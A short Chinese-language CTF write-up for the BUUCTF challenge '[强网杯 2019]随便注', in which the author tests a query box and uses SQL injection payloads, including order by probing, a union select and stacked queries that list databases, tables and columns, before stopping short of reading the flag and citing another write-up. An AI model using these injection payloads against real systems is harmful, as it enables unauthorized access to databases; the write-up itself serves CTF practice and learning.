BUUCTF [强网杯 2019]随便注

打开题目看见一个输入框
在这里插入图片描述
输入’报错 应该是有sql注入了

在这里插入图片描述
使用 1’ # 正确显示
BUUCTF [强网杯 2019]随便注_第1张图片
直接上 order by

1' order by 3 #

测试1,2正常,3报错

此时天真的我以为我已经离成功不远了~~

启动联合查询

-1' union select 1,2 #

提交
BUUCTF [强网杯 2019]随便注_第2张图片
测试发现堆叠注入可用

1';show databases;#

BUUCTF [强网杯 2019]随便注_第3张图片

1';show tables;#

BUUCTF [强网杯 2019]随便注_第4张图片

1';show columns from words;#

BUUCTF [强网杯 2019]随便注_第5张图片

1';show columns from 1919810931114514;#

BUUCTF [强网杯 2019]随便注_第6张图片
就在这时,这张表的数据查不出来,刚开始我还以为是我的问题,毕竟菜,是自己的问题概率毕竟大,还反复试了很久 -_-! ,至此,我明白了菜是原罪T_T.

最后去看了大佬的wp才知道不是我的问题,
不过最后的读出flag的骚操作还是要sql语言扎实才能想到…
参考:https://blog.csdn.net/qq_26406447/article/details/90643951

你可能感兴趣的:(CTF)